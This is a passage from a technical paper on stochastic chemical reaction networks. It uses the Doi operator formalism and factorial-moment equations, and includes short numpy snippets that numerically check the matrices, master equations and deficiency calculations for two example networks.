\label{fig:two_species_bistable}
}
\end{center}
\end{figure}
Its reaction scheme is
\begin{align}
& {\rm B} \xrightleftharpoons[\epsilon]{k_2}
\varnothing
\xrightleftharpoons[k_2]{\epsilon}
{\rm A} \nonumber \\
& 2 {\rm B} + {\rm A}
\xrightleftharpoons[k_1]{{\bar{k}}_1}
{\rm A} + {\rm B} \xrightleftharpoons[{\bar{k}}_1]{k_1}
2 {\rm A} + {\rm B}
\label{eq:cubic_2spec_scheme}
\end{align}
In the description of CRN's two matrices conventionally appear \cite{Feinberg:notes:79, Gunawardena:CRN_for_bio:03}.
An \textit{Adjacency matrix}, denoted by ${\cal{A}}$,
is the matrix of transition rates among complexes.
The matrix element ${\cal{A}}_{ij}$ for $i \neq j$ is the rate of the transition
(if any) that takes complex $j$ to complex $i$, with
${\cal{A}}_{jj} \equiv -\sum_{i \neq j}{\cal{A}}_{ij}$.
$\cal{A}$ has, by definition,
a zero left eigenvector $\left[ 1,1,..1 \right]$.
For the network in Fig. \ref{fig:g_123_conn} the
adjacency matrix is
\begin{equation}
\cal{A} =
\left[
\begin{array}{rrr}
- \alpha & \epsilon & 0 \\
\alpha & - 2\epsilon & \beta \\
0 & \epsilon & -\beta \\
\end{array}
\right] .
\label{eq:A_AA_AAA_rate_matrix}
\end{equation}
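The defining property that $\left[ 1,1,..1 \right]$ is a zero left eigenvector — equivalently, that every column of ${\cal A}$ sums to zero — is easy to verify numerically. A minimal sketch, assuming numpy and purely illustrative rate values:

```python
import numpy as np

# Illustrative rate constants (any positive values work).
alpha, eps, beta = 0.7, 0.2, 0.05

# Adjacency matrix over the complexes (A, 2A, 3A);
# column j collects the outflow and inflow rates of complex j.
A = np.array([
    [-alpha,      eps,   0.0],
    [ alpha, -2 * eps,  beta],
    [   0.0,      eps, -beta],
])

# [1, 1, 1] is a left null vector: each column sums to zero,
# reflecting conservation of probability flux among complexes.
col_sums = A.sum(axis=0)
print(col_sums)
```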
For the network in Fig. \ref{fig:two_species_bistable},
$\cal{A}$ is a $6 \times 6$ matrix over the
$6$ complexes: $\varnothing$, $\rm A$, $\rm B$, $\rm{A+B}$, $\rm{2A+B}$ and $\rm {A+2B}$.
\begin{equation}
\cal{A} =
\left[
\begin{array}{rrrrrr}
- 2\epsilon & k_2 & k_2 & 0&0&0 \\
\epsilon & - k_2 & 0 &0&0&0 \\
\epsilon &0& - k_2 & 0 &0&0 \\
0&0&0& -2 k_1& {\bar{k}}_1&{\bar{k}}_1 \\
0&0&0& k_1& -{\bar{k}}_1& 0 \\
0&0&0& k_1& 0 & -{\bar{k}}_1 \\
\end{array}
\right] .
\label{eq:cubic_rate_matrix}
\end{equation}
We assume mass-action rates (as in earlier work \cite{Feinberg:def_01:87, Anderson:product_dist:10}):
if ${\rm n}_a$ is the number of particles
of species ${\rm A}$, the rate at which complex ${\rm A}$ is converted
to any other complex is the rate constant times
${\rm n}_a$. Similarly, the rate at which complex $2 {\rm A}$
takes part in any reaction is the rate constant times ${\rm n}_a \left({\rm n}_a - 1 \right)$, {\em etc}.
The other matrix which is useful to define is the stoichiometric matrix $Y$.
An element $y_{p,i}$ of this matrix is the amount of
species $p$ in complex $i$. We denote by $Y_p$,
the $p^{th}$ row of this matrix.
For example, in the reaction scheme of Eq. (\ref{eq:A_AA_AAA_R_scheme}),
$Y$ is a row vector given by
\begin{equation}
Y =
\left[
\begin{array}{ccc}
1 & 2 & 3
\end{array}
\right]
\label{eq:123_y_form}
\end{equation}
For the reaction scheme of Eq. (\ref{eq:cubic_2spec_scheme}),
the $Y$ matrix is
\begin{equation}
Y =
\left[
\begin{array}{cccccc}
0 & 1 & 0 & 1 & 2 & 1 \\
0 & 0 & 1 & 1 & 1 & 2 \\
\end{array}
\right]
\label{eq:cubic_y_form}
\end{equation}
where the first row $Y_1$ refers to species $\rm A$, the second row $Y_2$
to species $\rm B$ and the columns $i$ refer to the complexes
in the order mentioned above.
The time-evolution of the species in a CRN, is described
by a master equation for the probability
${\rho}_{{\rm n}}$, where ${\rm n} \equiv \left[ {\rm n}_p \right]$
is a column vector,
with components which are the instantaneous
numbers of the different species $p$.
For example, for the CRN of Eq. (\ref{eq:A_AA_AAA_R_scheme}), the master equation is
\begin{align}
{\dot{\rho}}_{\rm n}
& =
\left\{
\left( e^{-\partial / \partial {\rm n}} -1 \right)
\left[
\alpha {\rm n} +
\epsilon {\rm n} \left( {\rm n} - 1 \right)
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{\partial / \partial {\rm n}} -1 \right)
\left[
\epsilon {\rm n} \left( {\rm n} - 1 \right) +
\beta
{\rm n} \left( {\rm n}-1 \right) \left( {\rm n}-2 \right)
\right]
\right\}
{\rho}_{\rm n} .
\label{eq:ME_g_123_R}
\end{align}
where the operators $e^{-\partial / \partial {\rm n}}$ (or
$e^{\partial / \partial {\rm n}}$)
act on any function $f \! \left( {\rm n} \right)$ and convert it to $f
\! \left( {\rm n}-1 \right)$ ($f \! \left( {\rm n} +1 \right)$ respectively)
\cite{Smith:LDP_SEA:11}.
For the network of Fig.~\ref{fig:two_species_bistable}, $\rm n$ becomes a
two-component index to $\rho$, which evolves under
\begin{align}
{\dot{\rho}}_{\rm n}
& =
\left\{
\left( e^{-\partial / \partial {\rm n}_a} -1 \right)
\left[
\epsilon +
k_1 {\rm n}_b {\rm n}_a
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{\partial / \partial {\rm n}_a} -1 \right)
\left[
k_2 {\rm n}_a +
{\bar{k}}_1
{\rm n}_b {\rm n}_a \left( {\rm n}_a-1 \right)
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{-\partial / \partial {\rm n}_b} -1 \right)
\left[
\epsilon +
k_1 {\rm n}_a {\rm n}_b
\right]
\right.
\nonumber \\
& \phantom{=}
\mbox{} +
\left.
\left( e^{\partial / \partial {\rm n}_b} -1 \right)
\left[
k_2 {\rm n}_b +
{\bar{k}}_1
{\rm n}_a {\rm n}_b \left( {\rm n}_b-1 \right)
\right]
\right\}
{\rho}_{\rm n}
\label{eq:ME_two_species_bistable}
\end{align}
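A minimal numerical sketch (ours, with illustrative rate values): truncating the state space to $0 \le {\rm n}_a, {\rm n}_b \le N$ turns Eq. (\ref{eq:ME_two_species_bistable}) into a finite linear system, and the stationary distribution is the null eigenvector of the truncated generator.

```python
import numpy as np
from itertools import product

eps, k2, k1, kb1 = 1.0, 1.0, 0.02, 0.02   # illustrative rate constants
N = 15                                     # per-species truncation

states = list(product(range(N + 1), repeat=2))   # (n_a, n_b)
index = {s: i for i, s in enumerate(states)}

def channels(na, nb):
    """(target state, rate) for the gain/loss channels of each species."""
    yield (na + 1, nb), eps + k1 * na * nb                   # 0->A, A+B->2A+B
    yield (na - 1, nb), k2 * na + kb1 * nb * na * (na - 1)   # A->0, 2A+B->A+B
    yield (na, nb + 1), eps + k1 * na * nb                   # 0->B, A+B->A+2B
    yield (na, nb - 1), k2 * nb + kb1 * na * nb * (nb - 1)   # B->0, A+2B->A+B

# Generator Q with Q[m, n] = rate of jump n -> m; columns sum to zero.
Q = np.zeros((len(states), len(states)))
for (na, nb), j in index.items():
    for tgt, rate in channels(na, nb):
        if tgt in index:          # drop flux leaving the truncated box
            Q[index[tgt], j] += rate
            Q[j, j] -= rate

# Stationary distribution: eigenvector of the eigenvalue closest to zero.
w, v = np.linalg.eig(Q)
rho = np.real(v[:, np.argmin(np.abs(w))])
rho = np.abs(rho) / np.abs(rho).sum()

mean_a = sum(rho[i] * s[0] for i, s in enumerate(states))
print(mean_a)
```

Unlike the one-species network, this network has no absorbing state (the null complex keeps injecting particles), so the truncated chain has a well-defined stationary distribution.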
In general, for a CRN with $P$ species,
the master equation is more conveniently written in terms
of an equation for the generating function $\phi (z) \equiv \sum_{{\rm n}} \left(\prod_{p = 1}^P z_p^{{{\rm n}}_p} \right) {\rho}_{{\rm n}}$
where $z\equiv \left[ z_p \right]$ is a vector.
The generating function evolves under a \textit{Liouville equation} of
the form
\begin{align}
\frac{\partial \phi}{\partial \tau} =
- \mathcal{L} \phi
\nonumber \\
\mbox{shorthand for } \quad
\frac{\partial}{\partial \tau}
\phi \! \left( z \right)
& =
- \mathcal{L} \!
\left( z , \frac{\partial}{\partial z} \right)
\phi \! \left( z \right) .
\label{eq:Liouville_eq_multi_arg}
\end{align}
$\mathcal{L}$ is called the \textit{Liouville Operator}.
\subsection {The Liouvillian}
$\mathcal{L}$ has a well-known representation, due to Doi \cite{Doi:SecQuant:76}, in terms of raising and lowering operators $a^{\dagger}$ and $a$.
We provide a brief introduction to the Doi algebra below \footnote{Much more comprehensive treatments are to be found in \cite{Cardy:FTNeqSM:99,Mattis:RDQFT:98}. Interpretations of terms in the Doi algebra in the language of conventional generating functions is elaborated on in detail in \cite{Smith:evo_games:15}.}.
The Doi algebra uses the following correspondence:
\begin{align}
z_p
& \rightarrow a^{\dagger}_p
&
\frac{\partial}{\partial z_p}
& \rightarrow
a_p .
\label{eq:a_adag_defs}
\end{align}
It follows that the operators obey the conventional commutation algebra
\begin{align}
\left[
a_p , a^{\dagger}_q
\right] =
{\delta}_{pq} ,
\label{eq:comm_relns}
\end{align}
where ${\delta}_{pq}$ is the Kronecker $\delta$.
Defining formal \textit{right-hand and left-hand null states},
\begin{align}
1
& \rightarrow
\left| 0 \right)
&
\int d^P \! z \,
{\delta}^P \! \left( z \right)
& \rightarrow
\left( 0 \right|
\label{eq:null_states}
\end{align}
(where ${\delta}^P \! \left( z \right)$ is the Dirac $\delta$ in $P$
dimensions, and the inner product of the null states is normalized:
$\left( 0 \mid 0 \right) = 1$),
for any vector ${\rm n} \equiv \left[ {\rm n}_p \right]$,
\begin{align}
&\prod_{p = 1}^P
{
a_p^{\dagger}
}^{{{\rm n}}_p}
\left| 0 \right) \equiv
\left| {\rm n} \right) .
\label{eq:number_states}
\end{align}
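The raising and lowering operators can be represented concretely as matrices on a truncated number basis $\left| 0 \right), \ldots, \left| N \right)$, which makes the commutation relation (and, below, the Glauber normalization) easy to verify. The finite truncation is our own illustrative device, not part of the formalism:

```python
import numpy as np
from math import factorial

N = 12
a  = np.zeros((N + 1, N + 1))
ad = np.zeros((N + 1, N + 1))
for n in range(N):
    a[n, n + 1]  = n + 1    # a|n) = n|n-1)   (Doi convention)
    ad[n + 1, n] = 1.0      # a_dag|n) = |n+1)

# [a, a_dag] = 1 holds away from the truncation boundary.
comm = a @ ad - ad @ a
print(np.allclose(comm[:N, :N], np.eye(N)))

# (0| e^a |n) = 1 for every n: a is nilpotent on the truncated space,
# so the exponential series terminates exactly at order N.
left = np.zeros(N + 1); left[0] = 1.0
expa = sum(np.linalg.matrix_power(a, k) / factorial(k) for k in range(N + 1))
glauber = left @ expa
print(glauber)   # a row of ones
```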
With these steps, the generating function $\phi$ becomes\footnote{
Note that though the generating function $\phi$ is explicitly
an analytic function of $z$, while the state $\left|\phi \right)$ is not,
the information they carry as a power series is exactly the same. Hence, for the purpose of generating moments, the fact that both are formal power series, of $z$ in one case and of $a^{\dagger}$ in the other, suffices without worrying about convergence properties \cite{Wilf:gen_fun:06}.}
\begin{align}
\phi \! \left( z \right) =
\sum_{{\rm n}}
\prod_{p = 1}^P
z_p^{{{\rm n}}_p}
{\rho}_{{\rm n}}
& \rightarrow
\sum_{{\rm n}}
{\rho}_{{\rm n}}
\left| {\rm n} \right) \equiv
\left| \phi \right) .
\label{eq:genfun_to_state}
\end{align}
The Liouville equation in this language
takes the form
\begin{align}
\frac{\partial \left| \phi \right) }{\partial \tau} =
- \mathcal{L} \!
\left( a_p , a_p^{\dagger}\right)
\left| \phi \right) .
\label{eq:Liouville_eq_ops}
\end{align}
For example,
the Liouville operator $\mathcal{L}$ for the network
of Fig. \ref{fig:g_123_conn} (and Eq. \ref{eq:A_AA_AAA_R_scheme}) is
\begin{align}
\mathcal{L}
& =
\left( 1 - a^{\dagger} \right)
\left[
\alpha a^{\dagger} a -
\epsilon \left( 1 - a^{\dagger} \right)
a^{\dagger} a^2 -
\beta {a^{\dagger}}^2 a^3
\right]
\nonumber \\
& =
\left( 1 - a^{\dagger} \right)
\left( a^{\dagger} \! a \right)
\left[
\left(
\alpha -
\epsilon a
\right) +
\left( a^{\dagger} \! a - 1 \right)
\left(
\epsilon -
\beta a
\right)
\right] .
\label{eq:L_123_R}
\end{align}
The Liouville operator corresponding to the two-species network (Fig. \ref{fig:two_species_bistable}) is
\begin{align}
\mathcal{L}
& =
\left( 1 - a^{\dagger} \right)
\left[
\left(
\epsilon -
k_2 a
\right) +
\left( b^{\dagger} \! b \right)
\left( a^{\dagger} \! a \right)
\left(
k_1 -
{\bar{k}}_1 a
\right)
\right]
\nonumber \\
& \phantom{=}
\mbox{} +
\left( 1 - b^{\dagger} \right)
\left[
\left(
\epsilon -
k_2 b
\right) +
\left( a^{\dagger} \! a \right)
\left( b^{\dagger} \! b \right)
\left(
k_1 -
{\bar{k}}_1 b
\right)
\right] .
\label{eq:L_two_species_bistable}
\end{align}
where $\left( a^{\dagger} , a \right)$ and $\left( b^{\dagger} , b \right)$,
are creation and annihilation operators for the number components ${\rm n}_a$ and ${\rm n}_b$, respectively.
The Liouvillian may be written more compactly
in terms of the matrices $\cal{A}$ and $Y$.
To accomplish this, we need to introduce a little more notation.
Define a column vector,
\begin{align}
{\psi}_Y^i \! \left( a \right)
& \equiv
\prod_p
\left(a_p\right)^{y_{p,i}}
\label{eq:Psi_psi_i_def}
\end{align}
${\psi}_Y^{\dagger} \equiv {\left[ {{\psi}^{\dagger}}_Y^i \right]}^T$
is then a row vector of components defined on the indices $i$ \footnote{The index $i$ on the LHS indicates a component of the row vector and not a power.},
\begin{equation}
{{\psi}^{\dagger}}_Y^i \!
\left( a^{\dagger} \right) \equiv
\prod_p
\left({a^{\dagger}}_p\right)^{y_{p,i}}
\label{eq:psi_dag_i_def}
\end{equation}
For example, for the two-species network, these
are simply
\begin{align}
{\psi}^{\dagger}
& =
\left[
\begin{array}{cccccc}
1 & a^{\dagger} & b^{\dagger} &
a^{\dagger} b^{\dagger} &
{a^{\dagger}}^2 b^{\dagger} &
a^{\dagger} {b^{\dagger}}^2
\end{array}
\right]
\nonumber \\
{\left( \psi \right)}^T
& =
\left[
\begin{array}{cccccc}
1 & a & b & ab & a^2 b & ab^2
\end{array}
\right]
\label{eq:num_vecs_two_species_bistable}
\end{align}
In this formalism, the Liouville operator takes on the simple form,
\begin{align}
- \mathcal{L}
& =
{\psi}^{\dagger}_Y
{\cal A}
{\psi}_Y
\label{eq:L_psi_from_A}
\end{align}
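Eq. (\ref{eq:L_psi_from_A}) can be verified numerically for the network of Fig. \ref{fig:g_123_conn}: assembling $\psi^{\dagger}_Y {\cal A} \psi_Y$ from truncated matrix representations of $a$ and $a^{\dagger}$ reproduces, entry by entry, the generator of the master equation (\ref{eq:ME_g_123_R}). A sketch with illustrative rate values:

```python
import numpy as np

N = 40
a  = np.zeros((N + 1, N + 1))
ad = np.zeros((N + 1, N + 1))
for n in range(N):
    a[n, n + 1]  = n + 1          # a|n) = n|n-1)
    ad[n + 1, n] = 1.0            # a_dag|n) = |n+1)

alpha, eps, beta = 0.7, 0.2, 0.05  # illustrative rates
Aadj = np.array([[-alpha,      eps,   0.0],
                 [ alpha, -2 * eps,  beta],
                 [   0.0,      eps, -beta]])

# -L = psi_dag(Y) . Aadj . psi(Y) with Y = [1, 2, 3]
psi_dag = [np.linalg.matrix_power(ad, y) for y in (1, 2, 3)]
psi     = [np.linalg.matrix_power(a,  y) for y in (1, 2, 3)]
minusL  = sum(Aadj[i, j] * psi_dag[i] @ psi[j]
              for i in range(3) for j in range(3))

# Master-equation generator in the number basis, built directly
# from the gain/loss rates of the one-species scheme.
Q = np.zeros((N + 1, N + 1))
for n in range(N + 1):
    up   = alpha * n + eps * n * (n - 1)
    down = eps * n * (n - 1) + beta * n * (n - 1) * (n - 2)
    if n < N:
        Q[n + 1, n] += up
    if n > 0:
        Q[n - 1, n] += down
    Q[n, n] -= up + down

M = N - 3   # compare a block safely away from the truncation boundary
print(np.allclose(minusL[:M, :M], Q[:M, :M]))
```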
\subsection {The Moment Hierarchy}
Entirely equivalent to solving the master equation or the Liouville equation, is to
solve the \textit{moment hierarchy}, namely to compute the time-dependent
values of \textit{all} the relevant moments in the problem.
The set of equations for all these moments, obtained directly
from the master equation or the Liouville equation,
is referred to as the moment hierarchy, because
usually lower-order moments couple to higher-order ones, resulting in an infinite
hierarchy of equations. Solving the moment hierarchy is hence by no means
a simple task and often involves making approximations. In what follows, we
demonstrate that for any mass-action CRN, the equations for
the \textit{factorial moments} (rather than the equations for ordinary moments) take on
a particularly tractable form. For the examples we consider, we show how this
tractability helps in solving the entire moment hierarchy in the steady state.
In order to see this, we first need to write down the
equations for the moments.
The time dependence of arbitrary moments is easily extracted from the
Liouville equation via the Glauber inner product,
which is a standard construction \cite{Cardy:FTNeqSM:99,Mattis:RDQFT:98}.
In the interest of completeness, we provide all relevant details in what follows.
As mentioned earlier, we will prefer instead to look
at the {\it factorial} moments (FM). In order to define these,
consider, for a single component ${{\rm n}}_p$ and power $k_p$, the quantity
\begin{align}
{{\rm n}}_p^{\underline{k_p}}
& \equiv
\frac{
{{\rm n}}_p !
}{
\left( {{\rm n}}_p - k_p \right) !
}
& ; \; k_p \le {{\rm n}}_p
\nonumber \\
& \equiv
0
& ; \; k_p > {{\rm n}}_p .
\label{eq:factorial_moment_not}
\end{align}
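The falling factorial ${\rm n}^{\underline{k}}$ counts the ordered ways of removing $k$ particles from a population of ${\rm n}$; in Python (3.8+) it is available directly as \texttt{math.perm}, including the convention that it vanishes for $k > {\rm n}$:

```python
from math import perm

def falling(n, k):
    """n^(underline k) = n (n-1) ... (n-k+1); zero when k > n."""
    return perm(n, k)   # math.perm is exactly n!/(n-k)! for k <= n, else 0

print(falling(5, 2))    # 5*4 = 20
print(falling(3, 5))    # 0: cannot remove 5 particles from 3
print(falling(4, 0))    # empty product = 1
```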
For a vector $k \equiv \left[ k_p \right]$ of powers and a vector ${\rm n}$ of
instantaneous numbers of the species, we
introduce the \textit{factorial moment} indexed by $k$, as
the expectation
\begin{equation}
\left<
{\rm n}^{\underline k}
\right> \equiv
\left<
\prod_p
{{\rm n}}_p^{\underline{k_p}}
\right> .
\label{eq:Phi_def}
\end{equation}
The FM are generated by the action of the lowering operator on the number state.
In particular, for any non-negative integer $k_p$,
\begin{align}
a_p^{k_p}
\left| {\rm n} \right)
& =
{{\rm n}}_p^{\underline{k_p}}
\left| {\rm n} - k_p \right)
\nonumber \\
{a^{\dagger}_p}^{k_p} a_p^{k_p}
\left| {\rm n} \right)
& =
{{\rm n}}_p^{\underline{k_p}}
\left| {\rm n} \right) .
\label{eq:trunc_fact_extract}
\end{align}
where $\left| {\rm n} - k_p \right)$ is the number state with $k_p$
subtracted from ${{\rm n}}_p$ and all ${{\rm n}}_q$ for $q \neq p$ unchanged.
The time dependence of the FM is then simply given by
\begin{align}
\frac{\partial}{\partial \tau}
\left<
\prod_p
{{\rm n}}_p^{\underline{k_p}}
\right> \equiv \frac{\partial}{\partial \tau}
\left<
{\rm n}^{\underline k}
\right>
& =
\left( 0 \right|
e^{\sum_q a_q}
{
\prod_p \left(a_p \right)
}^{k_p}
\left( - \mathcal{L} \right)
\left| \phi \right)
\nonumber \\
& =
\left( 0 \right|
e^{\sum_q a_q}
{ \prod_p \left(a_p \right)
}^{k_p}
{\psi}^{\dagger}_Y \! \left( a^{\dagger} \right)
{\cal A} \,
{\psi}_Y \! \left( a \right)
\left| \phi \right)
\label{eq:fac_mom}
\end{align}
In writing Eq. (\ref{eq:fac_mom}), we have used the fact that
all number states are normalized with respect to the \textit{Glauber
inner product}, defined by
\begin{align}
\left( 0 \right|
e^{\sum_p a_p}
\left| {\rm n} \right) = 1 , \quad
\forall {\rm n} .
\label{eq:Glauber_inn_prod}
\end{align}
The Glauber inner product with a generating function is simply the
trace of the underlying probability density:
\begin{align}
\left( 0 \right|
e^{\sum_p a_p}
\left| \phi \right) =
\sum_{{\rm n}}
{\rho}_{{\rm n}} = 1 .
\label{eq:Glauber_is_trace}
\end{align}
Eq. (\ref{eq:fac_mom}) denotes the time-evolution of a generic
FM for a CRN with an arbitrary number of species.
In particular, the equation for the first moment
takes on a simple form. Note that a
first moment, for a CRN of $P$ species, is
specified by a vector $k \equiv \left[ k_p \right]$,
with only one of the $k_p$'s being non-zero (and having the value $1$). This corresponds
to computing the average value of the number of one specific species $p$.
In this case, from Eq. (\ref{eq:fac_mom}), we need
only to commute $a_p$ through $ {\psi}^{\dagger}_Y \! \left( a^{\dagger} \right)$ \footnote{The general closed form expression for the commutation of $a_p^{k_p}$ through any power of $a^{\dagger}$ is given in Eq. (\ref{eq:comm_rules}).} to obtain,
\begin{align}
\frac{\partial}{\partial \tau} \left< {\rm n_p} \right> &=
Y_p {\cal A} \,
\left( 0 \right|
e^{\sum_q a_q} {\psi}_Y \! \left( a \right) \left| \phi \right)
\label{eq:CRN_std_rate_eqn}
\end{align}
In what follows, we refer to the inner product in
Eq.~(\ref{eq:CRN_std_rate_eqn})
as $E\left[{\psi}_Y \! \left( a \right) \right]$ to simplify notation.
Note that, using the above definitions, $E\left[a_p^{k_p}\right] \equiv \langle n_p^{\underline {k_p}} \rangle$: the FM of order $k_p$.
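As a consistency check (ours, not the paper's): closing Eq. (\ref{eq:CRN_std_rate_eqn}) with Poisson factorial moments, $E[{\psi}^i_Y] = x^{y_i}$, must reproduce the deterministic mass-action rate equation. For the network of Fig. \ref{fig:g_123_conn} a short computation gives $\dot{x} = \alpha x - \beta x^3$; the $\epsilon$ terms cancel in the first moment.

```python
import numpy as np

alpha, eps, beta = 0.7, 0.2, 0.05   # illustrative rates
A = np.array([[-alpha,      eps,   0.0],
              [ alpha, -2 * eps,  beta],
              [   0.0,      eps, -beta]])
Y = np.array([1, 2, 3])

rng = np.random.default_rng(0)
diffs = []
for x in rng.uniform(0.0, 5.0, size=5):
    psi = np.array([x, x**2, x**3])   # E[psi] under a Poisson distribution
    lhs = Y @ A @ psi                 # RHS of the first-moment equation
    rhs = alpha * x - beta * x**3     # rate equation; eps drops out
    diffs.append(abs(lhs - rhs))
print(max(diffs))
```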
\subsection{Deficiency}
It is useful at this stage to
understand the relations between the dimensions of the
matrix ${\cal A}$ and the matrix $Y{\cal A}$ (or the row vector $Y_p{\cal A}$).
The reason for considering these is that, as we see from Eq.~(\ref{eq:CRN_std_rate_eqn}), all steady states must lie in $ \ker\left( Y{\cal A} \right)$ (since
the steady state condition implies that the
LHS of Eq.~(\ref{eq:CRN_std_rate_eqn}) must vanish).
This can happen either because the steady state lies in $\ker {\cal A}$
(and so vanishes directly by the action of ${\cal A}$) or because
the steady state \textit{does not} lie in $\ker {\cal A}$
but nevertheless lies in $\ker\left(Y {\cal A} \right)$. The difference between
these two situations, as we will see, is precisely the difference between
$\delta=0$ and $\delta \neq 0$ networks.
By definition, the number of columns (and rows) of the
matrix ${\cal A}$ equals the number of complexes ${\mathcal{C}}$, so
${\cal A}$ acts on a space of dimension ${\mathcal{C}}$. Then from elementary considerations,
\begin{align}
\dim \left({\cal A} \right) &=
\dim \left( \Ima \left( {\cal A} \right) \right) +
\dim \left( \ker \left( {\cal A} \right) \right) \nonumber \\
& =
\dim \left( \Ima \left( Y {\cal A} \right) \right) +
\dim
\left(
\ker Y \cap \Ima \left( {\cal A} \right)
\right) + l \nonumber \\
& \equiv
s + \delta + l.
\label{eq:A_ident}
\end{align}
Here $ \dim \left( \ker \left( {\cal A} \right) \right) \equiv l$
where $l$ is the number of linkage classes \footnote{A linkage class is a connected component of the directed graph representing the CRN; $l=1$ for the CRN described by Eq. (\ref{eq:A_AA_AAA_R_scheme}) and $l=2$ for the CRN described by Eq. (\ref{eq:cubic_2spec_scheme})}. In Eq. (\ref{eq:A_ident}), the $ \dim \left( \Ima \left( {\cal A} \right) \right) $ is further split into those vectors
that either lie \textit{both} in the $\Ima ({\cal A})$ and $ \ker \left( Y \right)$ or lie in the $\Ima \left( Y {\cal A} \right)$.
Eq. (\ref{eq:A_ident})
provides a definition for the parameter $s$ and deficiency $\delta={\mathcal{C}} - s - l$ \cite{Feinberg:def_01:87}.
For the CRN in Fig. ~\ref{fig:g_123_conn}, $\mathcal{C}=3,l=1,s=1$ giving $\delta =1$.
For the CRN in Fig. ~\ref{fig:two_species_bistable}, $\mathcal{C}=6,l=2,s=2$ giving $\delta =2$.
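The deficiency can be computed mechanically as $\delta = \operatorname{rank}({\cal A}) - \operatorname{rank}(Y{\cal A})$, since $\operatorname{rank}({\cal A}) = {\mathcal{C}} - l$ and $s = \operatorname{rank}(Y{\cal A})$. A numerical sketch for the two example networks (the rate values are illustrative; any generic positive rates give the same ranks):

```python
import numpy as np

def deficiency(Y, A, n_linkage):
    """delta = C - s - l with s = rank(Y A) and l = dim ker A = n_linkage."""
    C = A.shape[0]
    s = np.linalg.matrix_rank(Y @ A)
    assert np.linalg.matrix_rank(A) == C - n_linkage
    return C - s - n_linkage

# Network of Fig. 1: complexes (A, 2A, 3A)
alpha, eps, beta = 0.7, 0.2, 0.05
A1 = np.array([[-alpha,      eps,   0.0],
               [ alpha, -2 * eps,  beta],
               [   0.0,      eps, -beta]])
Y1 = np.array([[1, 2, 3]])

# Network of Fig. 2: complexes ordered (0, A, B, A+B, 2A+B, A+2B)
k1, kb1, k2 = 0.3, 0.4, 0.6
A2 = np.array([
    [-2*eps,  k2,  k2,    0,    0,    0],
    [   eps, -k2,   0,    0,    0,    0],
    [   eps,   0, -k2,    0,    0,    0],
    [     0,   0,   0, -2*k1,  kb1,  kb1],
    [     0,   0,   0,   k1, -kb1,    0],
    [     0,   0,   0,   k1,    0, -kb1],
])
Y2 = np.array([[0, 1, 0, 1, 2, 1],
               [0, 0, 1, 1, 1, 2]])

d1 = deficiency(Y1, A1, 1)
d2 = deficiency(Y2, A2, 2)
print(d1, d2)
```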
For $\delta =0$ networks, all steady states
lie simultaneously in $\ker \left({\cal A} \right)$ and in $\ker \left( Y {\cal A} \right)$ and are termed \textit{complex-balanced}.
If $\delta > 0$, this is no longer true.
In what follows, we derive some new
results for CRN's in this category.
From the above discussion, it follows that
we can define basis vectors
${\left\{ e_i \right\}}_{i = 1}^s$ for ${\ker \left(Y{\mathcal{A}} \right)}^{\perp}$, the space of vectors perpendicular to those lying in $\ker \left( Y {\cal A} \right)$.
Let also ${\left\{ {\tilde{e}}_j \right\}}_{j = 1}^{\delta}$ be a
basis for $\ker \left( Y{\mathcal{A}} \right) / \ker \left({\mathcal{A}} \right)$, the space of vectors lying in $\ker \left( Y {\cal A} \right)$ but {\em not} in $\ker \left( {\cal A} \right)$.
It follows that jointly $\left\{ {\left\{ e_i \right\}}_{i =
1}^s, {\left\{ {\tilde{e}}_j \right\}}_{j = 1}^{\delta} \right\}$ form
a basis for ${\ker \left( {\mathcal{A}} \right)}^{\perp}$.
Then from Eq.~(\ref{eq:L_psi_from_A}),
\begin{align}
- \mathcal{L}
& =
{\psi}^{\dagger}_Y
{\mathcal{A}}
\left\{
\sum_{i = 1}^s
e_i e_i^T +
\sum_{j = 1}^{\delta}
{\tilde{e}}_j {\tilde{e}}_j^T
\right\}
{\psi}_Y
\label{eq:Ls_reps}
\end{align}
The fact that the second sum plays no role for $\delta =0$ networks
has implications for the steady state, as we will see in Section II F.
It is easy to explicitly work out these basis vectors for specific
examples (such as the networks of Fig. \ref{fig:g_123_conn}
and Fig. \ref{fig:two_species_bistable}) \cite{Smith:LP_CRN:17}.
\subsection{Equation for the Factorial Moments}
Eq. (\ref{eq:fac_mom}) is valid for a generic FM, but may be simplified
further by writing the RHS in terms of the matrices $Y$ and ${\cal A}$,
in correspondence to the equation for the first moment Eq. (\ref{eq:CRN_std_rate_eqn}).
In order to see this, we need to understand what terms
we get when we commute $a_p^{k_p}$ through $ {\psi}^{\dagger}_Y \! \left( a^{\dagger} \right)$
which contains terms like ${a_p^{\dagger y}}$.
For non-negative integers $k_p$ and $y$, we can use the relation
\begin{align}
{\left( a_p^{k_p} {a_p^{\dagger y}} \right)}
& = \sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
{k_p} \\ j
\end{array}
\right)
{
{y}^{\underline j} {a_p^{\dagger}}^{y-j} a_p^{k_p-j}
}
\label{eq:comm_rules}
\end{align}
where $y^{\underline 0}=1$ and, for $j \geq 1$,
${y}^ {\underline j} = y(y-1) \cdots (y-j+1)$, which vanishes
whenever $j > y$. It is now easily seen that,
\begin{align}
\left( 0 \right|
e^a
{
\left( a_p \right)
}^{k_p}
{{\psi}^{\dagger}}_Y^i \! \left( a^{\dagger} \right)
=
\left( 0 \right|
\sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
k_p \\ j
\end{array}
\right)
{
\left( Y_{p} \right)
}^{\underline j}
e^a
{
\left(
a_p
\right)
}^{k_p - j}
\label{eq:np_psii_comm_exp}
\end{align}
where ${\left( Y_{p} \right)}^{\underline j}$ is the row vector with components
$y_{p,i}^{\underline j}$, obtained by applying the falling factorial elementwise to the $p^{th}$ row of $Y$.
In Eq. (\ref{eq:np_psii_comm_exp}) we have also used ${\psi}^{\dagger} \! \left( a^{\dagger} =1 \right) = {1}$, which holds because $
\left( 0 \right| e^a a^{\dagger y} = \left( 0 \right| {\left( 1+
a^{\dagger} \right) }^y e^a = \left( 0 \right|e^a $.
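Eq. (\ref{eq:comm_rules}) can be checked numerically on a truncated number basis. This is an illustrative verification only: the matrix truncation is our own device, and the comparison is restricted to a block unaffected by the cutoff.

```python
import numpy as np
from math import comb, perm

N = 20
a  = np.zeros((N + 1, N + 1))
ad = np.zeros((N + 1, N + 1))
for n in range(N):
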